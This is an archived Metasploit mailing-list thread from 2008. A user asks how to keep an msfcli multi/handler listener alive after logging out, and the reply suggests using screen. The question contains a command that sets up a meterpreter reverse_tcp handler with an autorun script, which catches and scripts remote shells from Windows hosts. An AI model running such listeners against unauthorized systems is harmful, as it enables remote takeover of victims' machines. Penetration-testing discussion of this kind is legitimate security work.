Metasploit mailing list archives

run after logout


From: metasploit at backstep.net (Lukas Kuzmiak)
Date: Mon, 15 Dec 2008 17:50:58 +0100

try running it in screen, its perhaps the easiest solution for this :)

lukash

On Mon, Dec 15, 2008 at 5:48 PM, jeffs <jeffs at speakeasy.net> wrote:
I'd like to get a command like:

./msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp
lhost=192.168.1.101 lport=4444 autorunscript=mynewscript E

to continue running after I logout so subsequent request work.

I have tried:

nohup ./msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp
lhost=192.168.1.101 lport=4444 autorunscript=mynewscript E &

but this only works for one request after logging out of the terminal.

Is there something I'm missing here?

Thanks
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework




-- 
Only wimps use tape backup: _real_ men just upload their important
stuff on ftp, and let the rest of the world mirror it ;). Torvalds,
Linus (1996-07-20).



Current thread: